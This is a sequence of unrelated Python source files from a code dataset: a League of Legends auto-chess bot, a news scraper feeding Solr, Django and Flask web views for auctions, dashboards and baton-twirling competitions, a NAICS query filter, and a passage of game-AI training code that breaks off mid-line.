15:\n\n                    done_flag = 0\n                    break\n                done_flag = 1\n            if done_flag:\n                HeroPos.append(\n                    (singlePos[0] + imgPos['myHero'][0],\n                     singlePos[1] + imgPos['myHero'][1]))\n        return HeroPos\n\n        # debug helper: uncomment to draw the boxes; ideally this would become a live overlay on top of the LoL window\n        # remember to also comment out the return above\n        # draw_img = target.copy()\n        # for test in temp_HeroPos:\n        #     rect = cv2.rectangle(draw_img, test, (test[0] - 40, test[1] - 70), (0, 0, 255), 1)\n        #\n        # cv2.imshow('rect', hstack((target, rect)))\n        # cv2.waitKey(0)\n        # cv2.destroyAllWindows()\n        # print(HeroPos)\n\n    except BaseException:\n        return False\n\n\n# sell a hero\ndef sellHero(singlePos):\n    show_action('卖掉英雄')\n    drag(singlePos[0], singlePos[1], 940 + randint(-30, 30), 993)\n    sleep(random() / 3)\n\n\n# adjust a hero's position on the board\ndef moveHero(aimPos, hero):\n    # if the target is close to the current position, leave the hero where it is\n    if abs(\n            aimPos[0] -\n            heroPosX[hero]) < 55 and abs(\n            aimPos[1] -\n            heroPosY[hero]) < 55:\n        pass\n    else:\n        drag(aimPos[0], aimPos[1], heroPosX[hero], heroPosY[hero])\n        
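# drag() click-holds the hero at its detected position and drops it on the\n        # assigned slot from heroPosX/heroPosY\n        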
show_action(str(hero) + '号英雄就位')\n sleep(random() / 3)\n\n\n# 装备\ndef moveEquip():\n rand_equip = randint(0, len(equipPosX) - 1)\n # 重点关照的英雄,这里选的是1号 3号 4号 6号\n hero_index = [0, 2, 3, 5]\n choose_hero = hero_index[randint(0, len(hero_index) - 1)]\n drag(\n equipPosX[rand_equip],\n equipPosY[rand_equip],\n heroPosX[choose_hero],\n heroPosY[choose_hero])\n show_action(str(rand_equip + 1) + '装备到' + str(choose_hero + 1) + '号英雄')\n sleep(random() / 3)\n\n# 新开游戏\n\n\ndef startNewGame():\n print(\"-----------------------------------------\")\n print(\"新的一局\")\n print(\"-----------------------------------------\")\n\n\n# 设置D的开始时间和间隔\ndef D_set(nowtime, begin, gap):\n global lastDTime\n if (nowtime - startTime) > begin:\n if (nowtime - lastDTime) > gap:\n D()\n lastDTime = time()\n\n\n# 设置F的开始时间和间隔\ndef F_set(nowtime, begin, gap):\n global lastFTime\n if (nowtime - startTime) > begin:\n if (nowtime - lastFTime) > gap:\n F()\n lastFTime = time()\n\n\n# 设置装备的开始时间和间隔\ndef equip_set(nowtime, begin, gap):\n global lastEquipTime\n if (nowtime - startTime) > begin:\n if (nowtime - lastEquipTime) > gap:\n moveEquip()\n lastEquipTime = time()\n\n\n# 设置装备的开始时间和间隔\ndef ball_set(nowtime, begin, gap):\n global lastBallTime\n if (nowtime - startTime) > begin:\n if (nowtime - lastBallTime) > gap:\n getBall()\n lastBallTime = time()\n\n\n# 捡球\ndef getBall():\n doKey(rightClickIcon, 'R')\n\n\nif __name__ == '__main__':\n print(\" ________ _____ \")\n print(r\"|__ / _ \\| ____|\")\n print(\" / / | | | _| \")\n print(\" / /| |_| | |___ \")\n print(r\"/____\\___/|_____|\")\n print(\"\")\n print(\"----作者:星†空----\")\n print(\"免费软件,切勿用作商业目的!!!!!!\")\n print(\"原作者: https://github.com/zhouxingkong/LOL-yunding\")\n\n print(\"灰烬猫猫 学习重构\")\n print('fork: https://github.com/AshenNeko/LOL-yunding')\n print(\"-----------------------------------------\")\n print(\"脚本已启动,请转到游戏界面\")\n print(\"-----------------------------------------\")\n while True:\n # ----------------------在游戏中---------------------------\n while judgeInGame():\n if start_flag:\n start_flag = 0\n startTime = time()\n show_action(\n '----------------------游戏开始,开始计时---------------------------')\n\n ChooseHero() # 买英雄\n\n # ----------------------己方回合---------------------------\n if judgeMyTurn():\n show_action(\n '----------------------进入己方回合---------------------------')\n PosList = getHeroPos() # 获得英雄位置\n # 获得位置失败\n if not PosList:\n continue\n # 获得成果\n for singlePos in PosList[:]: # 逐个遍历\n hero = judgeHero(singlePos) # 当前位置英雄ID\n\n # 再判别一遍,要不然非己方无法移动\n if judgeMyTurn():\n if hero >= 0: # 是想要的\n moveHero(singlePos, hero)\n else: # 不是想要的\n # 大于600s才开始卖英雄,防止前期无英雄可用\n if (time() - startTime) > 600:\n sleep(1)\n # 再判断一遍,防止误删\n if judgeHero(singlePos) < 0:\n sellHero(singlePos)\n else:\n break\n sleep(3)\n\n # ----------------------敌对回合---------------------------\n show_action(\n '----------------------进入对敌回合---------------------------')\n # 480s后开始装装备,10s一次尝试\n equip_set(time(), 480, 10)\n # 700s后开始D,30s一次尝试\n D_set(time(), 700, 30)\n # 700s后开始D,60s一次尝试\n F_set(time(), 700, 60)\n # 200s后开始找球,30s一次尝试\n ball_set(time(), 200, 30)\n ChooseHero() # 买英雄\n sleep(3)\n\n # ----------------------不在游戏中---------------------------\n show_action('----------------------不在游戏里---------------------------')\n startKey() # 执行开始游戏控件,保证游戏不断\n\n # 太久不动,可能是客户端有部分显示错误,尝试救赎\n if (time() - startTime) > 2400:\n leftClick(949, 
785)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"311414368","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport time\nimport datetime\nimport pysolr\nclass ExampleSpider(scrapy.Spider):\n name = \"vnexpress\"\n solr = pysolr.Solr('http://localhost:8983/solr/nhom8/', timeout=10)\n arc_count=0\n contents=[]\n\n def start_requests(self):\n url1=\"https://vnexpress.net/tin-tuc/thoi-su/\"\n url2=\"https://vnexpress.net/tin-tuc/the-gioi/\"\n url3=\"https://kinhdoanh.vnexpress.net/\"\n url4=\"https://giaitri.vnexpress.net/\"\n url5=\"https://thethao.vnexpress.net/\"\n listurl=[]\n listurl.append(url1)\n listurl.append(url2)\n listurl.append(url3)\n listurl.append(url4)\n listurl.append(url5)\n for page in range(1,11):\n url=url1+\"page/\"+str(page)+\".html\"\n listurl.append(url)\n url=url2+\"page/\"+str(page)+\".html\"\n listurl.append(url)\n url=url3+\"page/\"+str(page)+\".html\"\n listurl.append(url)\n url=url4+\"page/\"+str(page)+\".html\"\n listurl.append(url)\n url=url5+\"page/\"+str(page)+\".html\"\n listurl.append(url)\n pass\n for url in listurl:\n yield scrapy.Request(url=url, callback=self.parse_url)\n def parse_url(self, response):\n list_url = response.css(\"h3.title_news a::attr(href)\").extract()\n del list_url[1::2]\n # print (list_url)\n time.sleep(5)\n for sub_url in list_url:\n if(self.arc_count<2000):\n yield scrapy.Request(url=sub_url, callback=self.parse_arc)\n else:\n pass\n # yield scrapy.Request(url=list_url[0], callback=self.parse_arc)\n\n def parse_arc(self, response):\n self.arc_count+=1\n ts=str(time.time())+str(self.arc_count)\n\n url=response.url\n\n title = response.css(\"h1.title_news_detail::text\").extract()\n\n print(\"======>\")\n # pr\n if(len(title)!=0):\n title = title[0]\n\n text=\"\"\n article=response.css(\"article.content_detail p\")\n for p in article:\n t1=p.css(\"p::text\").extract()\n for txt in t1:\n text=text+txt\n sp1=p.css(\"span::text\").extract()\n for txt in sp1:\n text=text+txt\n\n content={\"id\":ts,\"origin\":\"8\",\"url\":url,\"title\":title,\"content\":text}\n self.contents.append(content);\n if (self.arc_count % 10==0):\n self.solr.add(self.contents)\n self.contents=[]\n else:\n pass\n # print(\"text===========>\")\n # print (text)\n # print(\"text===========>\")\n","sub_path":"vnexpress.py","file_name":"vnexpress.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"398049919","text":"from django.contrib.auth import get_user_model\nfrom asgiref.sync import async_to_sync\nfrom channels.generic.websocket import WebsocketConsumer\nimport json\nimport requests\nfrom datetime import timedelta\nfrom datetime import datetime\nUser = get_user_model()\nURL_BASE = \"http://172.17.0.3:5000/\"\n\nclass ChatConsumer(WebsocketConsumer):\n def fetch_messages(self, data):\n room_name = int(data['auction_id'])\n r = requests.get(URL_BASE +\n \"auction/get-auction-history?item_id={}\".format(room_name))\n if r is None:\n return\n r_dict = r.json()\n print(\"DEBUG: AUCTION HISTORY {}\".format(r_dict))\n auction_list = r_dict[\"auction_list\"]\n messages = []\n for auction_record in auction_list:\n buyer_id = int(auction_record[\"auction_user_id\"])\n res = requests.post(URL_BASE + \"login/get-account-info\",\n json={\"account_id\": buyer_id})\n if res is None:\n continue\n buyer_dict = res.json()\n if 
\"first_name\" not in buyer_dict:\n return \n price = auction_record[\"auction_price\"]\n auction_time = int(auction_record[\"auction_time\"])\n time_stamp = datetime.fromtimestamp(auction_time)\n messages.append({\"price\": price,\n \"time_stamp\": time_stamp,\n \"buyer\": {\n \"id\": buyer_id,\n \"first_name\": buyer_dict[\"first_name\"],\n \"last_name\": buyer_dict[\"last_name\"],\n }})\n print(messages)\n content = {\n 'messages': self.messages_to_json(messages),\n 'command': 'messages'\n }\n self.send_message(content)\n pass\n\n def new_message(self, data):\n sender_id = int(data['from'])\n auction_id = int(data['auction_id'])\n price = int(float(data['price']))\n r = requests.post(URL_BASE + \"login/get-account-info\",\n json={\"account_id\": sender_id})\n if r is None:\n return print(\"new message seller is invalid\")\n r_dict = r.json()\n first_name = r_dict[\"first_name\"]\n last_name = r_dict[\"last_name\"]\n sender = {\n \"id\": sender_id,\n \"first_name\": first_name,\n \"last_name\": last_name\n }\n message = {\n \"buyer\": sender,\n \"price\": price,\n \"time_stamp\": datetime.now()\n }\n res = requests.post(URL_BASE + \"auction/bid-item\",\n json = {\"auction_price\": int(price),\n \"auction_user_id\": sender_id,\n \"item_id\": auction_id})\n if res is None:\n print(\"DEBUG: BID ITEM FAILED\")\n return\n content = {\n 'command': 'new_message',\n 'message': self.message_to_json(message)\n }\n return self.send_chat_message(content)\n\n def fetch_items(self, data):\n sender_id = int(data['from'])\n res = requests.get(URL_BASE +\n \"shopping-cart/list-user-shopping-cart-items\" +\n \"?user_id={}\".format(sender_id))\n if res is None:\n return\n res_dict = res.json()\n items = []\n if type(res_dict) is dict:\n items = self.items_to_json(res_dict[\"item_list\"])\n content = {\n 'items': items,\n 'command': 'items'\n }\n self.send_message(content)\n\n def new_item(self, data):\n sender_id = int(data['from'])\n item_id = int(data['auction_id'])\n content = {\n 'command': 'new_item',\n 'item': self.item_to_json(item_id),\n 'from': sender_id\n }\n return self.send_chat_message(content)\n\n def messages_to_json(self, messages):\n result = []\n for message in messages:\n result.append(self.message_to_json(message))\n return result\n\n def message_to_json(self, message):\n return {\n 'id': message[\"buyer\"][\"id\"],\n 'sender': message[\"buyer\"][\"first_name\"] + \" \" + message[\"buyer\"][\"last_name\"],\n 'profile_image': \"/media/profile_images/profilepic.jpg\",\n 'price': message[\"price\"],\n 'timestamp': str(message[\"time_stamp\"].strftime('%Y-%m-%d %H:%M:%S')),\n }\n\n def items_to_json(self, item_ids):\n result = []\n for item_id in item_ids:\n result.append(self.item_to_json(item_id))\n return result\n\n def item_to_json(self, item_id):\n res = requests.post(URL_BASE + \"item/get-item-info\",\n json={\"item_id\": item_id})\n if res is None:\n print(\"ERROR: ITEM ID is invalid.\")\n return {}\n res_dict = res.json()\n return {\n 'name': res_dict.get(\"item_name\"),\n 'item_image': res_dict.get(\"image_url\"),\n 'price': res_dict.get(\"current_auction_price\"),\n }\n\n commands = {\n 'fetch_messages': fetch_messages,\n 'new_message': new_message,\n 'fetch_items': fetch_items,\n 'new_item': new_item,\n }\n\n def connect(self):\n self.room_name = self.scope['url_route']['kwargs']['room_name']\n self.room_group_name = 'chat_%s' % self.room_name\n\n async_to_sync(self.channel_layer.group_add)(\n self.room_group_name,\n self.channel_name\n )\n\n self.accept()\n\n def 
disconnect(self, close_code):\n async_to_sync(self.channel_layer.group_discard)(\n self.room_group_name,\n self.channel_name\n )\n\n def receive(self, text_data):\n data = json.loads(text_data)\n print(data)\n if data['command'] in self.commands:\n self.commands[data['command']](self, data)\n\n def send_chat_message(self, message):\n async_to_sync(self.channel_layer.group_send)(\n self.room_group_name,\n {\n 'type': 'chat_message',\n 'message': message\n }\n )\n\n def send_message(self, message):\n self.send(text_data=json.dumps(message))\n\n def chat_message(self, event):\n message = event['message']\n self.send(text_data=json.dumps(message))\n","sub_path":"webserver/auctionApp/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":6410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"128093447","text":"from flask import Blueprint, request\nfrom flask.json import jsonify\nfrom SQL import get_number_confirmed_bans, get_number_tracked_players, get_report_stats, get_region_report_stats\n\ndashboard = Blueprint('dashboard', __name__, template_folder='templates')\n\n#######################\n# Dashboard Endpoints #\n#######################\n\n\n@dashboard.route('/site/dashboard/gettotaltrackedplayers', methods=['GET'])\ndef get_total_tracked_players():\n num_of_players = get_number_tracked_players()\n return_dict = {\n \"players\": num_of_players[0]\n }\n\n return jsonify(return_dict)\n\n\n@dashboard.route('/site/dashboard/getreportsstats', methods=['GET'])\ndef get_total_reports():\n report_stats = get_report_stats()[0]\n\n return_dict = {\n \"bans\": int(report_stats[0]),\n \"false_reports\": int(report_stats[1]),\n \"total_reports\": int(report_stats[2]),\n \"accuracy\": float(report_stats[3])\n }\n\n return return_dict\n\n@dashboard.route('/site/dashboard/getregionstats', methods=['GET'])\ndef get_region_reports():\n region_stats = get_region_report_stats()\n\n print(region_stats)\n print(type(region_stats))\n\n return 'OK'\n\n\n\n# CORS Policy: Allow Access to These Methods From Any Origin\n@dashboard.after_request\ndef after_request(response):\n header = response.headers\n header['Access-Control-Allow-Origin'] = '*'\n return response\n","sub_path":"mysite/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"623726009","text":"from usaspending_api.common.exceptions import InvalidParameterException\nfrom usaspending_api.search.elasticsearch.filters.filter import _Filter, _QueryType\nfrom elasticsearch_dsl import Q as ES_Q\n\n\nclass NaicsCodes(_Filter):\n underscore_name = \"naics_codes\"\n\n @classmethod\n def generate_elasticsearch_query(cls, filter_values, query_type: _QueryType) -> ES_Q:\n # legacy functionality permits sending a single list of naics codes, which is treated as the required list\n if isinstance(filter_values, list):\n require = filter_values\n exclude = []\n elif isinstance(filter_values, dict):\n require = filter_values.get(\"require\") or []\n exclude = filter_values.get(\"exclude\") or []\n else:\n raise InvalidParameterException(f\"naics_codes must be an array or object\")\n\n if [value for value in require if len(str(value)) not in [2, 4, 6]] or [\n value for value in exclude if len(str(value)) not in [2, 4, 6]\n ]:\n raise InvalidParameterException(\"naics code filtering only supported for codes with lengths of 2, 4, and 6\")\n\n requires = [str(code) for 
code in require]\n        exclude = [str(code) for code in exclude]\n\n        return ES_Q(\"query_string\", query=cls._query_string(requires, exclude), default_field=\"naics_code.keyword\")\n\n    @classmethod\n    def _query_string(cls, require, exclude) -> str:\n        \"\"\"Generates string in proper syntax for Elasticsearch query_string attribute, given API parameters\"\"\"\n        positive_codes, negative_codes = cls._order_naics_codes(require, exclude, require + exclude)\n\n        positive_nodes = [\n            _NaicsNode(code, True, positive_codes[\"sub\"], negative_codes[\"sub\"]) for code in positive_codes[\"top\"]\n        ]\n        negative_nodes = [\n            _NaicsNode(code, False, positive_codes[\"sub\"], negative_codes[\"sub\"]) for code in negative_codes[\"top\"]\n        ]\n\n        positive_query = \" OR \".join([node.get_query() for node in positive_nodes])\n        negative_query = \" AND \".join([node.get_query() for node in negative_nodes])\n\n        if positive_query and negative_query:\n            return f\"{positive_query} AND {negative_query}\"\n        else:\n            return positive_query + negative_query  # We know that exactly one is blank thanks to TinyShield\n\n    @staticmethod\n    def _order_naics_codes(requires, exclude, all_codes):\n        \"\"\"Separates NAICS codes into 'top' codes (those with no higher node in either array), and 'sub' codes (those that do).\"\"\"\n        positive_codes = {\n            \"top\": [code for code in requires if len([root for root in all_codes if code[:-1].startswith(root)]) == 0]\n        }\n        negative_codes = {\n            \"top\": [code for code in exclude if len([root for root in all_codes if code[:-1].startswith(root)]) == 0]\n        }\n        positive_codes[\"sub\"] = [code for code in requires if code not in positive_codes[\"top\"] + negative_codes[\"top\"]]\n        negative_codes[\"sub\"] = [code for code in exclude if code not in positive_codes[\"top\"] + negative_codes[\"top\"]]\n\n        return positive_codes, negative_codes\n\n\nclass _NaicsNode:\n    \"\"\"Represents one part of the final query, either requiring or excluding one NAICS code, with any exceptions\"\"\"\n\n    code: str\n    positive: bool\n    children: list\n\n    def __init__(self, code, positive, positive_naics, negative_naics):\n        self.code = code\n        self.positive = positive\n        self.populate_children(positive_naics, negative_naics)\n\n    def populate_children(self, positive_naics, negative_naics):\n        self.children = []\n        self._pop_children_helper(positive_naics, True, positive_naics, negative_naics)\n        self._pop_children_helper(negative_naics, False, positive_naics, negative_naics)\n\n    def _pop_children_helper(self, codes, is_positive, positive_naics, negative_naics):\n        for other_code in codes:\n            if len(other_code) == len(self.code) + 2 and other_code[: len(self.code)] == self.code:\n                self.children.append(_NaicsNode(other_code, is_positive, positive_naics, negative_naics))\n\n    def get_query(self):\n        retval = f\"{self.code}\"\n        if len(self.code) < 6:\n            retval += \"*\"\n        if not self.positive:\n            retval = f\"NOT {retval}\"\n        retval = f\"({retval})\"\n\n        positive_child_query = \" OR \".join([child.get_query() for child in self.children if child.positive])\n        negative_child_query = \" AND \".join([child.get_query() for child in self.children if not child.positive])\n        joined_child_query = \" AND \".join(query for query in [positive_child_query, negative_child_query] if query)\n\n        if self.children:\n            if self.positive:\n                retval += f\" AND ({joined_child_query})\"\n            else:\n                retval += f\" OR ({joined_child_query})\"\n\n        return 
f\"({retval})\"\n","sub_path":"usaspending_api/search/elasticsearch/filters/naics.py","file_name":"naics.py","file_ext":"py","file_size_in_byte":4901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"135135076","text":"from django.contrib.auth.models import User\nfrom django.urls import reverse_lazy\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.generic.list import ListView\nfrom django.views.generic import CreateView, FormView, DetailView\nfrom django.contrib.auth.mixins import PermissionRequiredMixin\n\nfrom .forms import (\n NewCompetitionForm,\n NewEventForm,\n RegistrationForm,\n CompetitionConfigForm,\n)\nfrom .models import Competition, Event\n\nfrom organizations.models import Organization, OrganizationEvent, AgeDivision, Level\nfrom competitions.models import Event\n\n\nclass CompetitionListView(ListView):\n model = Competition\n template_name = \"competitions.html\"\n context_object_name = \"competitions\"\n\n def get_queryset(self):\n return Competition.objects.all().filter(status=\"PUBLISHED\")\n\n\nclass CompetitionManagerView(PermissionRequiredMixin, ListView):\n permission_required = \"competitions.is_competition_coordinator\"\n model = Competition\n context_object_name = \"my_competitions\"\n template_name = \"competitions_manage.html\"\n\n def get_queryset(self):\n current_user = self.request.user\n return Competition.objects.all().filter(creator=current_user)\n\nclass CompetitionDetailView(DetailView):\n model = Competition\n context_object_name = \"competition\"\n\nclass CompetitionDetailAboutView(CompetitionDetailView):\n template_name = \"competition_detail_about.html\"\n\nclass CompetitionDetailEventsView(CompetitionDetailView):\n template_name = \"competition_detail_events.html\"\n\n def get_context_data(self, *args, **kwargs):\n context = super(CompetitionDetailEventsView, self).get_context_data()\n user = self.request.user\n competition = get_object_or_404(Competition, pk=self.kwargs['pk'])\n context[\"other_events\"] = Event.objects.filter(competition=competition).exclude(athletes=user)\n context[\"my_events\"] = Event.objects.filter(competition=competition, athletes=user)\n return context\n\nclass CompetitionDetailFAQsView(CompetitionDetailView):\n template_name = \"competition_detail_faqs.html\"\n\n\nclass CompetitionCreateView(CreateView):\n model = Competition\n template_name = \"new_competition.html\"\n fields = [\n \"title\",\n \"organization\",\n \"tier\",\n \"description\",\n \"location\",\n \"start_date\",\n \"end_date\",\n ]\n\n def get_success_url(self, **kwargs):\n print(self.object.pk)\n return reverse_lazy(\"new_competition_config\", kwargs={\"pk\": self.object.pk})\n\n def form_valid(self, form):\n form.instance.creator = self.request.user\n self.object = form.save()\n organization = get_object_or_404(Organization, pk=self.object.organization.pk)\n return super().form_valid(form)\n\n\nclass CompetitionConfigView(FormView):\n form_class = CompetitionConfigForm\n template_name = \"new_competition_config.html\"\n context_object_name = \"competition\"\n\n def get_success_url(self, **kwargs):\n return reverse_lazy(\"manage_competitions\")\n\n def get_form_kwargs(self):\n competition = get_object_or_404(Competition, pk=self.kwargs[\"pk\"])\n organization = get_object_or_404(Organization, pk=competition.organization.pk)\n kwargs = super().get_form_kwargs()\n kwargs.update({\"organization\": organization})\n return kwargs\n\n def post(self, request, *args, 
**kwargs):\n competition = get_object_or_404(Competition, pk=kwargs[\"pk\"])\n form = self.get_form()\n if form.is_valid():\n event_types = form.cleaned_data[\"event_types\"]\n levels = form.cleaned_data[\"levels\"]\n min_age_divisions = form.cleaned_data[\"age_divisions\"]\n include_open_events = form.cleaned_data[\"open_events\"]\n include_visitor_events = form.cleaned_data[\"visitor_events\"]\n title_event_entry_fee = form.cleaned_data[\"title_entry_fee\"]\n open_event_entry_fee = form.cleaned_data[\"open_entry_fee\"]\n visitor_event_entry_fee = form.cleaned_data[\"visitor_entry_fee\"]\n event_tuples = []\n print(\"open events value: \", include_open_events)\n for event in event_types:\n for level in levels:\n print(level)\n organization_level = get_object_or_404(Level,\n organization=competition.organization,\n name__exact=level\n )\n print(organization_level)\n for division in min_age_divisions:\n organization_age_division = get_object_or_404(AgeDivision, \n organization=competition.organization,\n age_min=division\n )\n age_max = organization_age_division.age_max or 0\n event_dict = {\n \"event\": event, \n \"level\": organization_level, \n \"age_min\": division,\n \"age_max\": age_max,\n \"registration_fee\": title_event_entry_fee,\n \"category\": \"TITLE\"\n }\n if \"Men's\" in event:\n event_dict[\"gender\"] = \"MALE\"\n else:\n event_dict[\"gender\"] = \"FEMALE\"\n event_tuples.append(event_dict)\n\n if include_open_events:\n open_copy = event_dict.copy()\n open_copy[\"category\"] = \"OPEN\"\n open_copy[\"registration_fee\"] = open_event_entry_fee\n event_tuples.append(open_copy)\n \n if include_visitor_events:\n visitor_copy = event_dict.copy()\n visitor_copy[\"category\"] = \"VISITOR\"\n visitor_copy[\"registration_fee\"] = visitor_event_entry_fee\n event_tuples.append(visitor_copy)\n for tup in event_tuples:\n try:\n Event.objects.create_event(\n tup[\"event\"],\n competition,\n tup[\"level\"],\n tup[\"age_min\"],\n tup[\"age_max\"],\n tup[\"gender\"],\n tup[\"registration_fee\"],\n tup[\"category\"],\n )\n except Exception as e:\n print(\"ERROR: \", e)\n pass\n form = self.get_form()\n return self.form_valid(form)\n else:\n return self.form_invalid(form)\n\n\ndef edit_competition(request, pk):\n template = \"new_competition.html\"\n competition = get_object_or_404(Competition, pk=pk)\n\n if request.method == \"POST\":\n form = NewCompetitionForm(request.POST, instance=competition)\n\n try:\n if form.is_valid():\n form.save()\n # messages.success(request, 'Your event has been updated.')\n return redirect(\"manage_competitions\")\n except Exception as e:\n # messages.warning(request, 'Your event was not saved due to an error: {}'.format(e))\n print(e)\n\n else:\n form = NewCompetitionForm(instance=competition)\n\n context = {\"form\": form, \"competition\": competition}\n\n return render(request, template, context)\n\nclass CompetitionManageEventsView(DetailView):\n model = Competition\n template_name = \"competitions_manage_events.html\"\n\n\n def get_context_data(self, *args, **kwargs):\n \n def event_type_finder(event):\n return event.event_type\n\n context = super(CompetitionManageEventsView, self).get_context_data()\n competition = get_object_or_404(Competition, pk=self.kwargs['pk'])\n events = competition.events.all()\n all_event_types = map(event_type_finder, events)\n unique_event_types = set(all_event_types)\n \n event_type_objects = []\n for event_type in unique_event_types:\n obj = { \"name\": event_type, \"levels\": [] }\n unique_levels = set(map(lambda x: x.level, 
events.filter(event_type=event_type)))\n for level in unique_levels:\n obj[\"levels\"].append({\n \"name\": level,\n \"age_divisions\": set(\n map(lambda x: x.age_division, \n events.filter(\n event_type=event_type, \n level=level\n )\n )\n )\n })\n event_type_objects.append(obj)\n context[\"event_types\"] = event_type_objects\n return context\n\n\ndef delete_competition(request, pk):\n competition = get_object_or_404(Competition, pk=pk)\n competition.delete()\n\n return redirect(\"manage_competitions\")\n\n\ndef new_event(request, pk):\n template = \"new_event.html\"\n\n competition = get_object_or_404(Competition, pk=pk)\n\n if request.method == \"POST\":\n form = NewEventForm(request.POST)\n if form.is_valid():\n event = Event.objects.create(\n type=form.cleaned_data.get(\"type\"),\n competition=Competition.objects.get(pk=pk),\n lane=form.cleaned_data.get(\"lane\"),\n gender=form.cleaned_data.get(\"gender\"),\n level=form.cleaned_data.get(\"level\"),\n age=form.cleaned_data.get(\"age\"),\n )\n event.judges.set(form.cleaned_data.get(\"judges\"))\n event.clerks.set(form.cleaned_data.get(\"clerks\"))\n event.athletes.set(form.cleaned_data.get(\"athletes\"))\n return redirect(\"competition_detail_events\", pk=pk)\n else:\n form = NewEventForm()\n\n context = {\"form\": form, \"competition\": competition}\n\n return render(request, template, context)\n\n\ndef edit_event(request, pk, event_pk):\n template = \"new_event.html\"\n competition = get_object_or_404(Competition, pk=pk)\n event = get_object_or_404(Event, pk=event_pk)\n\n if request.method == \"POST\":\n form = NewEventForm(request.POST, instance=event)\n\n try:\n if form.is_valid():\n form.save()\n # messages.success(request, 'Your event has been updated.')\n return redirect(\"competition_detail_events\", pk=competition.pk)\n except Exception as e:\n # messages.warning(request, 'Your event was not saved due to an error: {}'.format(e))\n print(e)\n\n else:\n form = NewEventForm(instance=event)\n\n context = {\"form\": form, \"competition\": competition, \"event\": event}\n\n return render(request, template, context)\n\n\ndef delete_event(request, pk, event_pk):\n twirlingEvent = get_object_or_404(Event, pk=event_pk)\n twirlingEvent.delete()\n\n return redirect(\"competition_detail_events\", pk=pk)\n\n\ndef event_detail(request, pk, event_pk):\n template = \"event_detail.html\"\n\n competition = get_object_or_404(Competition, pk=pk)\n twirlingEvent = get_object_or_404(Event, pk=event_pk)\n\n context = {\"competition\": competition, \"event\": twirlingEvent}\n\n return render(request, template, context)\n\n\ndef register_for_event(request, pk, event_pk):\n user = request.user\n competition = get_object_or_404(Competition, pk=pk)\n twirlingEvent = get_object_or_404(Event, pk=event_pk)\n\n twirlingEvent.athletes.add(user)\n twirlingEvent.save()\n\n return redirect(\"event_detail\", pk=pk, event_pk=event_pk)\n\n\ndef unregister_for_event(request, pk, event_pk):\n user = request.user\n competition = get_object_or_404(Competition, pk=pk)\n twirlingEvent = get_object_or_404(Event, pk=event_pk)\n\n twirlingEvent.athletes.remove(user)\n twirlingEvent.save()\n\n return redirect(\"event_detail\", pk=pk, event_pk=event_pk)\n\n\ndef unregister_from_competition(request, pk):\n user = request.user\n competition = get_object_or_404(Competition, pk=pk)\n allCompetitionEvents = Event.objects.all().filter(competition=competition)\n for event in allCompetitionEvents:\n if user in event.athletes.all():\n event.athletes.remove(user)\n event.save()\n\n 
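    # with the per-event registrations cleared, also drop the athlete from the competition-level roster\n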
competition.registered_athletes.remove(user.profile)\n competition.save()\n\n return redirect(\"competition_detail_about\", pk=pk)\n\n\ndef register_for_competition(request, pk):\n template = \"register_for_competition.html\"\n competition = get_object_or_404(Competition, pk=pk)\n\n if request.method == \"POST\":\n form = RegistrationForm(competition, request.POST)\n user = request.user\n\n try:\n if form.is_valid():\n user.profile.registeredCompetitions.add(competition)\n user.save()\n selectedEvents = form.cleaned_data[\"events\"]\n for event in selectedEvents:\n eventObj = get_object_or_404(Event, pk=event.id)\n eventObj.athletes.add(user)\n eventObj.save()\n # form.save()\n # messages.success(request, 'Your event has been updated.')\n return redirect(\"competition_detail_events\", pk=competition.pk)\n except Exception as e:\n # messages.warning(request, 'Your event was not saved due to an error: {}'.format(e))\n print(e)\n\n else:\n form = RegistrationForm(competition)\n\n context = {\"form\": form, \"competition\": competition}\n\n return render(request, template, context)\n","sub_path":"competitions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"567753450","text":"import pandas as pd\nimport numpy as np\nimport torch\nfrom boardlaw.main import mix, half, as_chunk\nfrom pavlov import storage\nfrom rebar import arrdict\nfrom logging import getLogger\nfrom boardlaw.hex import Hex\nfrom boardlaw.mcts import MCTSAgent\n\nlog = getLogger(__name__)\n\ndef optimize(network, scaler, opt, batch):\n\n with torch.cuda.amp.autocast():\n d0 = batch.decisions\n d = network(batch.worlds)\n\n zeros = torch.zeros_like(d.logits)\n l = d.logits.where(d.logits > -np.inf, zeros)\n l0 = d0.logits.float().where(d0.logits > -np.inf, zeros)\n\n policy_loss = -(l0.exp()*l).sum(axis=-1).mean()\n\n target_value = batch.reward_to_go\n value_loss = (target_value - d.v).square().mean()\n\n loss = policy_loss + value_loss\n\n opt.zero_grad()\n scaler.scale(loss).backward()\n old = {k: v.detach().clone() for k, v in network.state_dict().items()}\n scaler.step(opt)\n scaler.update()\n network.load_state_dict(old)\n\ndef gradients(run, i, n_envs=16*1024, buffer_len=64, device='cuda'):\n\n #TODO: Restore league and sched when you go back to large boards\n worlds = mix(Hex.initial(n_envs, device=device))\n network = storage.load_raw(run, 'model')\n agent = MCTSAgent(network)\n\n opt = torch.optim.Adam(network.parameters(), lr=0., amsgrad=True)\n scaler = torch.cuda.amp.GradScaler()\n\n sd = storage.load_snapshot(run, i)\n agent.load_state_dict(sd['agent'])\n opt.load_state_dict(sd['opt'])\n scaler.load_state_dict(sd['scaler'])\n\n buffer = []\n\n idxs = (torch.randint(buffer_len, (n_envs,), device=device), torch.arange(n_envs, device=device))\n while True:\n\n # Collect experience\n while len(buffer) < buffer_len:\n with torch.no_grad():\n decisions = agent(worlds, value=True)\n new_worlds, transition = worlds.step(decisions.actions)\n\n buffer.append(arrdict.arrdict(\n worlds=worlds,\n decisions=decisions.half(),\n transitions=half(transition)).detach())\n\n worlds = 